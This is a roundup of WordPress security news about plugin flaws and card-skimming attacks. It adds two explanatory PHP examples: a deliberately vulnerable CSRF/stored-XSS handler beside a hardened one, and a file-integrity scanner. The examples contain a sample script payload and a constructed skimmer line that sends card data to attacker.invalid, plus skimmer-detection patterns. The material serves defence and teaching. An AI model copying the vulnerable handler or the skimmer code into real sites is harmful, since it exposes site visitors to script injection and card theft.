Security News
High-severity vulnerabilities patched in the Ninja Forms and LearnPress WordPress plugins could be exploited to take over vulnerable sites, WordPress security company Defiant reports. The developers of the highly popular Ninja Forms plugin last week addressed Cross-Site Request Forgery and Stored Cross-Site Scripting vulnerabilities that attackers could chain to trick an admin into importing a contact form containing malicious JavaScript code, which would then execute when certain pages are visited.
Several vulnerabilities, most of which have been described as cross-site scripting flaws, have been patched in WordPress this week with the release of version 5.4.1. WordPress 5.4.1, described as a short-cycle security and maintenance release, fixes 17 bugs and 7 vulnerabilities affecting version 5.4 and earlier.
Researchers have disclosed critical-severity flaws in three popular WordPress plugins used widely by colleges and universities: LearnPress, LearnDash and LifterLMS. The flaws, now patched, range in severity and impact: they could allow students to steal personal information, change their grades and cheat on tests, and could allow outside attackers to steal personal information or target the payment methods tied to the platforms.
Security researchers are sounding the alarm over newly discovered vulnerabilities in some popular online learning management system plugins that various organizations and universities use to offer online training courses through their WordPress-based websites. According to the Check Point Research Team, the three WordPress plugins in question - LearnPress, LearnDash, and LifterLMS - have security flaws that could permit students, as well as unauthenticated users, to pilfer personal information of registered users and even attain teacher privileges.
A vulnerability discovered last year in the defunct OneTone WordPress theme is now being exploited by hackers to compromise entire sites and install backdoor admin accounts. If the attack succeeds in hijacking an administrator's session, that access in turn allows them to create a backdoor admin account as well as set up additional PHP backdoors through the WordPress dashboard for added persistence.
A high-severity cross-site request forgery vulnerability in Real-Time Find and Replace, a WordPress plugin installed on more than 100,000 sites, could lead to cross-site scripting and the injection of malicious JavaScript anywhere on a victim site. In April, a pair of security vulnerabilities were found in Rank Math, a WordPress search engine optimization plugin.
The "Real-Time Find and Replace" WordPress plugin was updated recently to address a high severity vulnerability that could be exploited to inject code into a website. Designed to allow WordPress site admins to dynamically replace HTML content from themes and other plugins with content of their choosing before the page is served to users, the plugin is available as open source and has over 100,000 installations.
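The Ninja Forms and Real-Time Find and Replace items above describe the same class of bug: a privileged write path in a plugin that accepts a forged request and stores attacker-controlled markup, so a single CSRF against an admin becomes stored XSS for every visitor. The following is an added illustration, not code from either plugin or from WordPress itself: a minimal find-and-replace settings handler in the style Real-Time Find and Replace describes, shown first without and then with the checks WordPress provides. The `demo_` function names, hook names and option keys are hypothetical.

```php
<?php
// Added illustrative example; not Ninja Forms, Real-Time Find and Replace or WP core code.
// All demo_* names and the 'demo_rules' option key are hypothetical.

// VULNERABLE: any POST reaching admin-post.php with action=demo_save_rule is honoured.
// No nonce, so a page the attacker controls can submit this form from a logged-in
// admin's browser (CSRF); no capability check; the replacement is stored raw. Because
// the plugin's job is to emit that string into every page, CSRF becomes stored XSS.
function demo_save_rule_vulnerable() {
    $rules   = get_option( 'demo_rules', array() );
    $rules[] = array(
        'find'    => $_POST['find'],
        'replace' => $_POST['replace'], // e.g. "<script src=//attacker.invalid/s.js></script>"
    );
    update_option( 'demo_rules', $rules );
    wp_safe_redirect( admin_url( 'options-general.php?page=demo' ) );
    exit;
}
// add_action( 'admin_post_demo_save_rule', 'demo_save_rule_vulnerable' ); // do not hook

// HARDENED: same handler with the three controls the write path needs.
function demo_save_rule_hardened() {
    // 1. Capability: only users allowed to manage options may add rules.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // 2. Nonce: the token is bound to this action and this user's session; a cross-site
    //    form cannot know it, so check_admin_referer() dies on a forged request.
    check_admin_referer( 'demo_save_rule', 'demo_nonce' );

    // 3. Sanitize: keep the HTML a post author may use, strip <script>, on* handlers
    //    and javascript: URLs. Use a stricter filter if HTML is not needed at all.
    $find    = isset( $_POST['find'] ) ? sanitize_text_field( wp_unslash( $_POST['find'] ) ) : '';
    $replace = isset( $_POST['replace'] ) ? wp_kses_post( wp_unslash( $_POST['replace'] ) ) : '';
    if ( '' === $find ) {
        wp_die( 'Nothing to find', '', array( 'response' => 400 ) );
    }

    $rules   = get_option( 'demo_rules', array() );
    $rules[] = array( 'find' => $find, 'replace' => $replace );
    update_option( 'demo_rules', $rules );
    wp_safe_redirect( admin_url( 'options-general.php?page=demo' ) );
    exit;
}
add_action( 'admin_post_demo_save_rule', 'demo_save_rule_hardened' );

// The settings form. wp_nonce_field() emits the hidden token that
// check_admin_referer() later verifies, plus a hidden referer field.
function demo_render_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin-post.php' ) ); ?>">
        <input type="hidden" name="action" value="demo_save_rule">
        <?php wp_nonce_field( 'demo_save_rule', 'demo_nonce' ); ?>
        <input type="text" name="find" placeholder="find">
        <input type="text" name="replace" placeholder="replace">
        <?php submit_button( 'Add rule' ); ?>
    </form>
    <?php
}

// Front-end side: how a find-and-replace plugin rewrites the rendered page. Nothing here
// can tell attacker HTML from admin HTML, which is why the controls sit on the write path.
function demo_apply_rules( $html ) {
    foreach ( (array) get_option( 'demo_rules', array() ) as $rule ) {
        $html = str_replace( $rule['find'], $rule['replace'], $html );
    }
    return $html;
}
add_action( 'template_redirect', function () {
    ob_start( 'demo_apply_rules' );
} );
```

The order in the hardened handler matters: the capability check first, then the nonce, then sanitization. A nonce alone does not stop a low-privileged logged-in user who can obtain a valid token for their own session, and a capability check alone does not stop the CSRF case, where the victim is a genuine admin. The same applies to the Ninja Forms import handler: the import endpoint needs both checks, and imported field markup needs filtering before it is stored.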
Credit card swipers have found a hard-to-detect way to target WordPress websites using the WooCommerce plugin by secretly modifying legitimate JavaScript files. That's according to web security company Sucuri, which has detailed a recent attack it was called in to investigate on a site that had experienced a mysterious spate of credit card fraud.
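Tampering with a legitimate JavaScript file rather than dropping a new one defeats alerts that only look for unexpected files. What does catch it is a content baseline: hash every file in the plugin at a known-good point and compare later. The script below is an added example, not Sucuri's or WooCommerce's code. It builds such a baseline, reports modified, added and removed files, and runs a cheap indicator scan over changed `.js` files. The directory tree, file contents and the injected snippet are constructed for the demo, and the `demo_` names are hypothetical.

```php
<?php
// Added example; not Sucuri or WooCommerce code. demo_* names are hypothetical.

/** Walk $root and return [relative path => sha256] for every regular file. */
function demo_hash_tree( string $root ): array {
    $hashes = array();
    $root   = rtrim( $root, '/' );
    $it     = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator( $root, FilesystemIterator::SKIP_DOTS )
    );
    foreach ( $it as $file ) {
        if ( $file->isFile() ) {
            $rel            = substr( $file->getPathname(), strlen( $root ) + 1 );
            $hashes[ $rel ] = hash_file( 'sha256', $file->getPathname() );
        }
    }
    ksort( $hashes );
    return $hashes;
}

/** Compare a fresh scan against a stored baseline. */
function demo_diff_baseline( array $baseline, array $current ): array {
    $modified = array();
    foreach ( array_intersect_key( $baseline, $current ) as $path => $hash ) {
        if ( ! hash_equals( $hash, $current[ $path ] ) ) {
            $modified[] = $path;
        }
    }
    return array(
        'modified' => $modified,
        'added'    => array_keys( array_diff_key( $current, $baseline ) ),
        'removed'  => array_keys( array_diff_key( $baseline, $current ) ),
    );
}

/**
 * Indicator scan for a changed JS file. A skimmer must read card fields and send them
 * somewhere, so both appearing in one file is a strong hint. Heuristic, not proof.
 */
function demo_skimmer_indicators( string $path ): array {
    $src      = file_get_contents( $path );
    $patterns = array(
        'card_fields' => '/card[-_]?(number|num|expir|cvv|cvc)|billing_(first|last)_name/i',
        'exfil'       => '/XMLHttpRequest|fetch\(|navigator\.sendBeacon|new Image\(\)\.src/i',
        'encoding'    => '/eval\(|atob\(|btoa\(|String\.fromCharCode|unescape\(/i',
    );
    $hits = array();
    foreach ( $patterns as $label => $re ) {
        if ( preg_match( $re, $src ) ) {
            $hits[] = $label;
        }
    }
    return $hits;
}

// --- Constructed demo: baseline a clean copy, then tamper with one legitimate file.
$root = sys_get_temp_dir() . '/demo-plugin-' . getmypid();
mkdir( "$root/assets/js", 0700, true );
file_put_contents( "$root/assets/js/checkout.js", "jQuery(function(){ /* legitimate checkout code */ });\n" );
file_put_contents( "$root/readme.txt", "Stable tag: 1.0\n" );
$baseline = demo_hash_tree( $root );

// The attacker appends to the existing file instead of adding a new one.
file_put_contents(
    "$root/assets/js/checkout.js",
    "document.addEventListener('submit',function(){var d=jQuery('#card-number').val()+'|'+jQuery('#card-cvc').val();"
    . "fetch('https://attacker.invalid/c?d='+btoa(d));});\n",
    FILE_APPEND
);

$diff = demo_diff_baseline( $baseline, demo_hash_tree( $root ) );
foreach ( $diff['modified'] as $rel ) {
    $flags = substr( $rel, -3 ) === '.js' ? demo_skimmer_indicators( "$root/$rel" ) : array();
    printf( "MODIFIED %s indicators=%s\n", $rel, implode( ',', $flags ) );
}
foreach ( $diff['added'] as $rel )   { echo "ADDED $rel\n"; }
foreach ( $diff['removed'] as $rel ) { echo "REMOVED $rel\n"; }

// Clean up the constructed tree.
unlink( "$root/assets/js/checkout.js" );
unlink( "$root/readme.txt" );
rmdir( "$root/assets/js" ); rmdir( "$root/assets" ); rmdir( $root );
```

In production the baseline should come from a source the attacker cannot rewrite along with the files: WP-CLI's `wp core verify-checksums` and `wp plugin verify-checksums` compare an install against the checksums published by WordPress.org for the exact installed versions, which covers WooCommerce and any other plugin hosted there. A baseline stored on the same web server, or hashes taken after the compromise, give false assurance. The indicator scan is only a triage aid for the files the hash comparison flags; a modified file with no indicator hits still needs a manual look.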
A stored cross-site scripting vulnerability in the Contact Form 7 Datepicker WordPress plugin will not receive a patch, leaving websites exposed to attacks, WordPress security firm Defiant reports. The plugin, designed to integrate with the Contact Form 7 contact form management plugin, had over 100,000 installations when the vulnerability was discovered.